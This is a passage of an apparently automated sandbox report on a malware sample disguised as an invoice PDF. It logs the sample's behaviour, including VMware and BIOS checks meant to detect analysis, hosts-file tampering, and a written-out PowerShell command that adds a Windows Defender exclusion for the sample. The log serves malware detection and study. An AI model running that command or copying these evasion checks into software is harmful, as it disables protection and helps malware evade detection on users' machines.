                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe TID: 6008Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1244Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe TID: 6016Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe TID: 6328Thread sleep count: 929 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe TID: 6328Thread sleep count: 8916 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1416Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWindow / User API: threadDelayed 929Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWindow / User API: threadDelayed 8916Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.320230845.00000000084B0000.00000004.00000001.sdmpBinary or memory string: VMware
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: em%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: em"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.320230845.00000000084B0000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareB5M94S28Win32_VideoControllerHVOCWFL7VideoController120060621000000.000000-00086743248display.infMSBDAXU2CCEX1PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors5BS6WHF3m
                      Source: INVOICE & TELEX BL_PDF.exe, 00000001.00000002.314477041.00000000025C1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeCode function: 7_2_01476AC0 LdrInitializeThunk,7_2_01476AC0
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeProcess created: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeJump to behavior
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557034886.0000000001A60000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557034886.0000000001A60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557034886.0000000001A60000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: INVOICE & TELEX BL_PDF.exe, 00000007.00000002.557034886.0000000001A60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
